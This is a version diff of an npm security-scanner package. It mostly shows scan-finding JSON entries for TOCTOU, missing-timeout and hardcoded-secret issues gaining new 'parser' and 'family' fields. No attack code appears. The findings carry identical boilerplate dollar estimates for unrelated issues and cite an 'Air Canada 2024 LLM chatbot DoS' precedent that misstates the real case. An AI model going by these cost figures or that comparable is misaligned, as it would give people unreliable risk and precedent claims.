@clear-capabilities/agentic-security-scanner 0.76.1 → 0.78.0

Files changed (108)
  1. package/bin/.agentic-security/findings.json +320 -9
  2. package/bin/.agentic-security/last-scan.json +320 -9
  3. package/bin/.agentic-security/last-scan.json.sig +1 -1
  4. package/bin/.agentic-security/scan-history.json +17 -377
  5. package/bin/.agentic-security/streak.json +11 -16
  6. package/bin/agentic-security.js +33 -2
  7. package/dist/178.index.js +1 -1
  8. package/dist/384.index.js +1 -1
  9. package/dist/637.index.js +1 -1
  10. package/dist/718.index.js +106 -0
  11. package/dist/824.index.js +126 -0
  12. package/dist/838.index.js +1 -1
  13. package/dist/agentic-security.mjs +32 -32
  14. package/dist/agentic-security.mjs.sha256 +1 -1
  15. package/package.json +7 -7
  16. package/src/.agentic-security/findings.json +5731 -3933
  17. package/src/.agentic-security/last-scan.json +5731 -3933
  18. package/src/.agentic-security/last-scan.json.sig +1 -1
  19. package/src/.agentic-security/scan-history.json +2533 -887
  20. package/src/.agentic-security/streak.json +11 -16
  21. package/src/dataflow/.agentic-security/findings.json +52 -24
  22. package/src/dataflow/.agentic-security/last-scan.json +52 -24
  23. package/src/dataflow/.agentic-security/last-scan.json.sig +1 -1
  24. package/src/dataflow/.agentic-security/scan-history.json +101 -134
  25. package/src/dataflow/.agentic-security/streak.json +8 -10
  26. package/src/dataflow/async-sequencing.js +16 -7
  27. package/src/dataflow/builtin-summaries.js +131 -0
  28. package/src/dataflow/catalog.js +107 -0
  29. package/src/dataflow/cross-repo.js +75 -1
  30. package/src/dataflow/engine.js +129 -0
  31. package/src/dataflow/implicit-flow.js +24 -6
  32. package/src/dataflow/stub-aware-filter.js +69 -11
  33. package/src/dataflow/summaries.js +28 -3
  34. package/src/engine-parallel.js +70 -0
  35. package/src/engine.js +165 -15
  36. package/src/ir/.agentic-security/findings.json +757 -16
  37. package/src/ir/.agentic-security/last-scan.json +757 -16
  38. package/src/ir/.agentic-security/last-scan.json.sig +1 -1
  39. package/src/ir/.agentic-security/scan-history.json +545 -138
  40. package/src/ir/.agentic-security/streak.json +11 -13
  41. package/src/ir/index.js +22 -1
  42. package/src/ir/parser-go.js +403 -0
  43. package/src/ir/parser-js.js +2 -0
  44. package/src/ir/parser-php.js +330 -0
  45. package/src/ir/parser-py.helper.py +137 -11
  46. package/src/ir/parser-rb.js +309 -0
  47. package/src/posture/.agentic-security/findings.json +407 -84
  48. package/src/posture/.agentic-security/last-scan.json +407 -84
  49. package/src/posture/.agentic-security/last-scan.json.sig +1 -1
  50. package/src/posture/.agentic-security/scan-history.json +16 -4923
  51. package/src/posture/.agentic-security/streak.json +10 -14
  52. package/src/posture/calibration.js +14 -0
  53. package/src/posture/triage.js +13 -0
  54. package/src/report/.agentic-security/findings.json +6 -5
  55. package/src/report/.agentic-security/last-scan.json +6 -5
  56. package/src/report/.agentic-security/last-scan.json.sig +1 -1
  57. package/src/report/.agentic-security/scan-history.json +3 -300
  58. package/src/report/.agentic-security/streak.json +7 -8
  59. package/src/report/index.js +23 -2
  60. package/src/sast/.agentic-security/findings.json +195 -56
  61. package/src/sast/.agentic-security/last-scan.json +195 -56
  62. package/src/sast/.agentic-security/last-scan.json.sig +1 -1
  63. package/src/sast/.agentic-security/scan-history.json +14 -394
  64. package/src/sast/.agentic-security/streak.json +10 -13
  65. package/src/sast/cache-poisoning.js +77 -0
  66. package/src/sast/comparison-safety.js +73 -0
  67. package/src/sast/db-taint.js +54 -0
  68. package/src/sast/graphql.js +127 -0
  69. package/src/sast/llm-stored-prompt.js +57 -0
  70. package/src/sast/mutation-xss.js +43 -0
  71. package/src/sast/nosql-injection.js +5 -0
  72. package/src/sast/null-byte-injection.js +76 -0
  73. package/src/sast/redos-nfa.js +338 -0
  74. package/src/sast/sensitive-data-logging.js +73 -0
  75. package/src/sast/weak-password-hash.js +77 -0
  76. package/src/sast/weak-randomness.js +100 -0
  77. package/src/sca/.agentic-security/findings.json +502 -11
  78. package/src/sca/.agentic-security/last-scan.json +502 -11
  79. package/src/sca/.agentic-security/last-scan.json.sig +1 -1
  80. package/src/sca/.agentic-security/scan-history.json +19 -1
  81. package/src/sca/.agentic-security/streak.json +6 -6
  82. package/src/sca/llm-function-extract.js +107 -0
  83. package/src/sca/vendor-detect.js +91 -0
  84. package/dist/218.index.js +0 -793
  85. package/dist/601.index.js +0 -1038
  86. package/dist/634.index.js +0 -1892
  87. package/src/integrations/.agentic-security/findings.json +0 -1504
  88. package/src/integrations/.agentic-security/last-scan.json +0 -1504
  89. package/src/integrations/.agentic-security/scan-history.json +0 -40
  90. package/src/integrations/.agentic-security/streak.json +0 -21
  91. package/src/llm-validator/.agentic-security/findings.json +0 -1891
  92. package/src/llm-validator/.agentic-security/last-scan.json +0 -1891
  93. package/src/llm-validator/.agentic-security/last-scan.json.sig +0 -1
  94. package/src/llm-validator/.agentic-security/scan-history.json +0 -168
  95. package/src/llm-validator/.agentic-security/streak.json +0 -20
  96. package/src/lsp/.agentic-security/findings.json +0 -28
  97. package/src/lsp/.agentic-security/last-scan.json +0 -28
  98. package/src/lsp/.agentic-security/scan-history.json +0 -79
  99. package/src/lsp/.agentic-security/streak.json +0 -22
  100. package/src/mcp/.agentic-security/findings.json +0 -8403
  101. package/src/mcp/.agentic-security/last-scan.json +0 -8403
  102. package/src/mcp/.agentic-security/last-scan.json.sig +0 -1
  103. package/src/mcp/.agentic-security/scan-history.json +0 -1182
  104. package/src/mcp/.agentic-security/streak.json +0 -22
  105. package/src/sast/bench-shape/.agentic-security/findings.json +0 -28
  106. package/src/sast/bench-shape/.agentic-security/last-scan.json +0 -28
  107. package/src/sast/bench-shape/.agentic-security/scan-history.json +0 -24
  108. package/src/sast/bench-shape/.agentic-security/streak.json +0 -22
@@ -1,7 +1,7 @@
1
1
  {
2
- "scanId": "f293f70c-5c2c-4047-8616-a06df84df107",
3
- "startedAt": "2026-05-20T15:34:19.073Z",
4
- "durationMs": 1144,
2
+ "scanId": "997198bb-2db8-40c6-93c5-53c52cd42d9b",
3
+ "startedAt": "2026-05-27T11:19:52.727Z",
4
+ "durationMs": 1095,
5
5
  "scanned": {
6
6
  "files": 98,
7
7
  "lines": 0
@@ -86,7 +86,9 @@
86
86
  "comparable": "AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight",
87
87
  "confidence": "low",
88
88
  "narrative": "Hardcoded Secret on `attack-playbooks.js:91` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight."
89
- }
89
+ },
90
+ "parser": "LOGIC",
91
+ "family": null
90
92
  },
91
93
  {
92
94
  "id": "f813e80ea9dc10f8",
@@ -167,7 +169,9 @@
167
169
  "comparable": "AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight",
168
170
  "confidence": "low",
169
171
  "narrative": "Hardcoded Secret on `mitigation-composite.js:27` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight."
170
- }
172
+ },
173
+ "parser": "LOGIC",
174
+ "family": null
171
175
  },
172
176
  {
173
177
  "id": "struct:deploy-platform.js:13:Synchronous_Blocking_I/O_(DoS_Risk_in_Server_Context)",
@@ -280,6 +284,7 @@
280
284
  "unvalidated": true,
281
285
  "cross_language": false,
282
286
  "family": "dos-sync-io",
287
+ "parser": "STRUCTURAL",
283
288
  "_unsigned": false,
284
289
  "_passThroughSigning": false,
285
290
  "signatureStatus": "verified",
@@ -513,6 +518,7 @@
513
518
  "unvalidated": true,
514
519
  "cross_language": false,
515
520
  "family": "dos-sync-io",
521
+ "parser": "STRUCTURAL",
516
522
  "_unsigned": false,
517
523
  "_passThroughSigning": false,
518
524
  "signatureStatus": "verified",
@@ -739,6 +745,7 @@
739
745
  "unvalidated": true,
740
746
  "cross_language": false,
741
747
  "family": "state-machine-bypass",
748
+ "parser": "STATE-MACHINE",
742
749
  "_unsigned": false,
743
750
  "_passThroughSigning": false,
744
751
  "signatureStatus": "verified",
@@ -918,6 +925,7 @@
918
925
  "unvalidated": true,
919
926
  "cross_language": false,
920
927
  "family": "state-machine-bypass",
928
+ "parser": "STATE-MACHINE",
921
929
  "_unsigned": false,
922
930
  "_passThroughSigning": false,
923
931
  "signatureStatus": "verified",
@@ -1097,6 +1105,7 @@
1097
1105
  "unvalidated": true,
1098
1106
  "cross_language": false,
1099
1107
  "family": "state-machine-bypass",
1108
+ "parser": "STATE-MACHINE",
1100
1109
  "_unsigned": false,
1101
1110
  "_passThroughSigning": false,
1102
1111
  "signatureStatus": "verified",
@@ -1276,6 +1285,7 @@
1276
1285
  "unvalidated": true,
1277
1286
  "cross_language": false,
1278
1287
  "family": "state-machine-bypass",
1288
+ "parser": "STATE-MACHINE",
1279
1289
  "_unsigned": false,
1280
1290
  "_passThroughSigning": false,
1281
1291
  "signatureStatus": "verified",
@@ -1455,6 +1465,7 @@
1455
1465
  "unvalidated": true,
1456
1466
  "cross_language": false,
1457
1467
  "family": "state-machine-bypass",
1468
+ "parser": "STATE-MACHINE",
1458
1469
  "_unsigned": false,
1459
1470
  "_passThroughSigning": false,
1460
1471
  "signatureStatus": "verified",
@@ -1634,6 +1645,7 @@
1634
1645
  "unvalidated": true,
1635
1646
  "cross_language": false,
1636
1647
  "family": "state-machine-bypass",
1648
+ "parser": "STATE-MACHINE",
1637
1649
  "_unsigned": false,
1638
1650
  "_passThroughSigning": false,
1639
1651
  "signatureStatus": "verified",
@@ -1813,6 +1825,7 @@
1813
1825
  "unvalidated": true,
1814
1826
  "cross_language": false,
1815
1827
  "family": "state-machine-bypass",
1828
+ "parser": "STATE-MACHINE",
1816
1829
  "_unsigned": false,
1817
1830
  "_passThroughSigning": false,
1818
1831
  "signatureStatus": "verified",
@@ -1992,6 +2005,7 @@
1992
2005
  "unvalidated": true,
1993
2006
  "cross_language": false,
1994
2007
  "family": "state-machine-bypass",
2008
+ "parser": "STATE-MACHINE",
1995
2009
  "_unsigned": false,
1996
2010
  "_passThroughSigning": false,
1997
2011
  "signatureStatus": "verified",
@@ -2171,6 +2185,7 @@
2171
2185
  "unvalidated": true,
2172
2186
  "cross_language": false,
2173
2187
  "family": "state-machine-bypass",
2188
+ "parser": "STATE-MACHINE",
2174
2189
  "_unsigned": false,
2175
2190
  "_passThroughSigning": false,
2176
2191
  "signatureStatus": "verified",
@@ -2325,7 +2340,9 @@
2325
2340
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2326
2341
  "confidence": "low",
2327
2342
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:117` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2328
- }
2343
+ },
2344
+ "parser": "LOGIC",
2345
+ "family": null
2329
2346
  },
2330
2347
  {
2331
2348
  "id": "3d7f5144e9ce1781",
@@ -2406,7 +2423,9 @@
2406
2423
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2407
2424
  "confidence": "low",
2408
2425
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:146` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2409
- }
2426
+ },
2427
+ "parser": "LOGIC",
2428
+ "family": null
2410
2429
  },
2411
2430
  {
2412
2431
  "id": "7d793329125fa392",
@@ -2487,7 +2506,9 @@
2487
2506
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2488
2507
  "confidence": "low",
2489
2508
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:154` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2490
- }
2509
+ },
2510
+ "parser": "LOGIC",
2511
+ "family": null
2491
2512
  },
2492
2513
  {
2493
2514
  "id": "logic:agents-memory.js:44:TOCTOU:_existsSync_followed_by_file_op",
@@ -2568,7 +2589,9 @@
2568
2589
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2569
2590
  "confidence": "low",
2570
2591
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:44` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2571
- }
2592
+ },
2593
+ "parser": "LOGIC",
2594
+ "family": null
2572
2595
  },
2573
2596
  {
2574
2597
  "id": "logic:agents-memory.js:69:TOCTOU:_existsSync_followed_by_file_op",
@@ -2649,7 +2672,9 @@
2649
2672
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2650
2673
  "confidence": "low",
2651
2674
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:69` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2652
- }
2675
+ },
2676
+ "parser": "LOGIC",
2677
+ "family": null
2653
2678
  },
2654
2679
  {
2655
2680
  "id": "logic:agents-memory.js:107:TOCTOU:_existsSync_followed_by_file_op",
@@ -2730,7 +2755,9 @@
2730
2755
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2731
2756
  "confidence": "low",
2732
2757
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:107` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2733
- }
2758
+ },
2759
+ "parser": "LOGIC",
2760
+ "family": null
2734
2761
  },
2735
2762
  {
2736
2763
  "id": "logic:auth-posture-import.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -2811,7 +2838,9 @@
2811
2838
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2812
2839
  "confidence": "low",
2813
2840
  "narrative": "TOCTOU: existsSync followed by file op on `auth-posture-import.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2814
- }
2841
+ },
2842
+ "parser": "LOGIC",
2843
+ "family": null
2815
2844
  },
2816
2845
  {
2817
2846
  "id": "logic:calibration-drift.js:39:TOCTOU:_existsSync_followed_by_file_op",
@@ -2892,7 +2921,9 @@
2892
2921
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2893
2922
  "confidence": "low",
2894
2923
  "narrative": "TOCTOU: existsSync followed by file op on `calibration-drift.js:39` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2895
- }
2924
+ },
2925
+ "parser": "LOGIC",
2926
+ "family": null
2896
2927
  },
2897
2928
  {
2898
2929
  "id": "logic:cve-alert-daemon.js:271:TOCTOU:_existsSync_followed_by_file_op",
@@ -2973,7 +3004,9 @@
2973
3004
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2974
3005
  "confidence": "low",
2975
3006
  "narrative": "TOCTOU: existsSync followed by file op on `cve-alert-daemon.js:271` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2976
- }
3007
+ },
3008
+ "parser": "LOGIC",
3009
+ "family": null
2977
3010
  },
2978
3011
  {
2979
3012
  "id": "logic:cve-alert-daemon.js:289:TOCTOU:_existsSync_followed_by_file_op",
@@ -3054,7 +3087,9 @@
3054
3087
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3055
3088
  "confidence": "low",
3056
3089
  "narrative": "TOCTOU: existsSync followed by file op on `cve-alert-daemon.js:289` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3057
- }
3090
+ },
3091
+ "parser": "LOGIC",
3092
+ "family": null
3058
3093
  },
3059
3094
  {
3060
3095
  "id": "98b34a187b2233f4",
@@ -3135,7 +3170,9 @@
3135
3170
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3136
3171
  "confidence": "low",
3137
3172
  "narrative": "Known-Broken Code Marker Near Security-Sensitive Logic on `cve-lookup.js:64` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3138
- }
3173
+ },
3174
+ "parser": "LOGIC",
3175
+ "family": null
3139
3176
  },
3140
3177
  {
3141
3178
  "id": "logic:cve-lookup.js:32:TOCTOU:_existsSync_followed_by_file_op",
@@ -3216,7 +3253,9 @@
3216
3253
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3217
3254
  "confidence": "low",
3218
3255
  "narrative": "TOCTOU: existsSync followed by file op on `cve-lookup.js:32` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3219
- }
3256
+ },
3257
+ "parser": "LOGIC",
3258
+ "family": null
3220
3259
  },
3221
3260
  {
3222
3261
  "id": "logic:deterministic.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -3297,7 +3336,9 @@
3297
3336
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3298
3337
  "confidence": "low",
3299
3338
  "narrative": "TOCTOU: existsSync followed by file op on `deterministic.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3300
- }
3339
+ },
3340
+ "parser": "LOGIC",
3341
+ "family": null
3301
3342
  },
3302
3343
  {
3303
3344
  "id": "6f8230ef374727c1",
@@ -3378,7 +3419,9 @@
3378
3419
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
3379
3420
  "confidence": "low",
3380
3421
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `epss.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
3381
- }
3422
+ },
3423
+ "parser": "LOGIC",
3424
+ "family": null
3382
3425
  },
3383
3426
  {
3384
3427
  "id": "logic:epss.js:34:TOCTOU:_existsSync_followed_by_file_op",
@@ -3459,7 +3502,9 @@
3459
3502
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3460
3503
  "confidence": "low",
3461
3504
  "narrative": "TOCTOU: existsSync followed by file op on `epss.js:34` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3462
- }
3505
+ },
3506
+ "parser": "LOGIC",
3507
+ "family": null
3463
3508
  },
3464
3509
  {
3465
3510
  "id": "logic:exploitability-probability.js:142:TOCTOU:_existsSync_followed_by_file_op",
@@ -3540,7 +3585,9 @@
3540
3585
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3541
3586
  "confidence": "low",
3542
3587
  "narrative": "TOCTOU: existsSync followed by file op on `exploitability-probability.js:142` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3543
- }
3588
+ },
3589
+ "parser": "LOGIC",
3590
+ "family": null
3544
3591
  },
3545
3592
  {
3546
3593
  "id": "logic:feature-flags.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -3621,7 +3668,9 @@
3621
3668
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3622
3669
  "confidence": "low",
3623
3670
  "narrative": "TOCTOU: existsSync followed by file op on `feature-flags.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3624
- }
3671
+ },
3672
+ "parser": "LOGIC",
3673
+ "family": null
3625
3674
  },
3626
3675
  {
3627
3676
  "id": "logic:fix-history.js:25:TOCTOU:_existsSync_followed_by_file_op",
@@ -3702,7 +3751,9 @@
3702
3751
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3703
3752
  "confidence": "low",
3704
3753
  "narrative": "TOCTOU: existsSync followed by file op on `fix-history.js:25` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3705
- }
3754
+ },
3755
+ "parser": "LOGIC",
3756
+ "family": null
3706
3757
  },
3707
3758
  {
3708
3759
  "id": "logic:fix-history.js:42:TOCTOU:_existsSync_followed_by_file_op",
@@ -3783,7 +3834,9 @@
3783
3834
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3784
3835
  "confidence": "low",
3785
3836
  "narrative": "TOCTOU: existsSync followed by file op on `fix-history.js:42` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3786
- }
3837
+ },
3838
+ "parser": "LOGIC",
3839
+ "family": null
3787
3840
  },
3788
3841
  {
3789
3842
  "id": "4d1f25f2f49d3c36",
@@ -3864,7 +3917,9 @@
3864
3917
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
3865
3918
  "confidence": "low",
3866
3919
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `flow-narration.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
3867
- }
3920
+ },
3921
+ "parser": "LOGIC",
3922
+ "family": null
3868
3923
  },
3869
3924
  {
3870
3925
  "id": "logic:grader-calibration.js:34:TOCTOU:_existsSync_followed_by_file_op",
@@ -3945,7 +4000,9 @@
3945
4000
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3946
4001
  "confidence": "low",
3947
4002
  "narrative": "TOCTOU: existsSync followed by file op on `grader-calibration.js:34` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3948
- }
4003
+ },
4004
+ "parser": "LOGIC",
4005
+ "family": null
3949
4006
  },
3950
4007
  {
3951
4008
  "id": "logic:grader-calibration.js:41:TOCTOU:_existsSync_followed_by_file_op",
@@ -4026,7 +4083,9 @@
4026
4083
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4027
4084
  "confidence": "low",
4028
4085
  "narrative": "TOCTOU: existsSync followed by file op on `grader-calibration.js:41` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4029
- }
4086
+ },
4087
+ "parser": "LOGIC",
4088
+ "family": null
4030
4089
  },
4031
4090
  {
4032
4091
  "id": "logic:holdout-eval.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -4107,7 +4166,9 @@
4107
4166
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4108
4167
  "confidence": "low",
4109
4168
  "narrative": "TOCTOU: existsSync followed by file op on `holdout-eval.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4110
- }
4169
+ },
4170
+ "parser": "LOGIC",
4171
+ "family": null
4111
4172
  },
4112
4173
  {
4113
4174
  "id": "logic:integrity.js:43:TOCTOU:_existsSync_followed_by_file_op",
@@ -4188,7 +4249,9 @@
4188
4249
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4189
4250
  "confidence": "low",
4190
4251
  "narrative": "TOCTOU: existsSync followed by file op on `integrity.js:43` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4191
- }
4252
+ },
4253
+ "parser": "LOGIC",
4254
+ "family": null
4192
4255
  },
4193
4256
  {
4194
4257
  "id": "logic:integrity.js:77:TOCTOU:_existsSync_followed_by_file_op",
@@ -4269,7 +4332,9 @@
4269
4332
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4270
4333
  "confidence": "low",
4271
4334
  "narrative": "TOCTOU: existsSync followed by file op on `integrity.js:77` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4272
- }
4335
+ },
4336
+ "parser": "LOGIC",
4337
+ "family": null
4273
4338
  },
4274
4339
  {
4275
4340
  "id": "logic:learning.js:30:TOCTOU:_existsSync_followed_by_file_op",
@@ -4350,7 +4415,9 @@
4350
4415
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4351
4416
  "confidence": "low",
4352
4417
  "narrative": "TOCTOU: existsSync followed by file op on `learning.js:30` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4353
- }
4418
+ },
4419
+ "parser": "LOGIC",
4420
+ "family": null
4354
4421
  },
4355
4422
  {
4356
4423
  "id": "logic:license-policy.js:30:TOCTOU:_existsSync_followed_by_file_op",
@@ -4431,7 +4498,9 @@
4431
4498
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4432
4499
  "confidence": "low",
4433
4500
  "narrative": "TOCTOU: existsSync followed by file op on `license-policy.js:30` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4434
- }
4501
+ },
4502
+ "parser": "LOGIC",
4503
+ "family": null
4435
4504
  },
4436
4505
  {
4437
4506
  "id": "068537d2082ff5e9",
@@ -4512,7 +4581,9 @@
4512
4581
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
4513
4582
  "confidence": "low",
4514
4583
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `llm-redteam.js:145` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
4515
- }
4584
+ },
4585
+ "parser": "LOGIC",
4586
+ "family": null
4516
4587
  },
4517
4588
  {
4518
4589
  "id": "logic:network-policy-import.js:85:TOCTOU:_existsSync_followed_by_file_op",
@@ -4593,7 +4664,9 @@
4593
4664
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4594
4665
  "confidence": "low",
4595
4666
  "narrative": "TOCTOU: existsSync followed by file op on `network-policy-import.js:85` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4596
- }
4667
+ },
4668
+ "parser": "LOGIC",
4669
+ "family": null
4597
4670
  },
4598
4671
  {
4599
4672
  "id": "cdf48e92135085d0",
@@ -4674,7 +4747,9 @@
4674
4747
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4675
4748
  "confidence": "low",
4676
4749
  "narrative": "Weak Randomness on `poc-generator.js:67` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4677
- }
4750
+ },
4751
+ "parser": "LOGIC",
4752
+ "family": null
4678
4753
  },
4679
4754
  {
4680
4755
  "id": "afe969d251c2bd7c",
@@ -4755,7 +4830,9 @@
4755
4830
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4756
4831
  "confidence": "low",
4757
4832
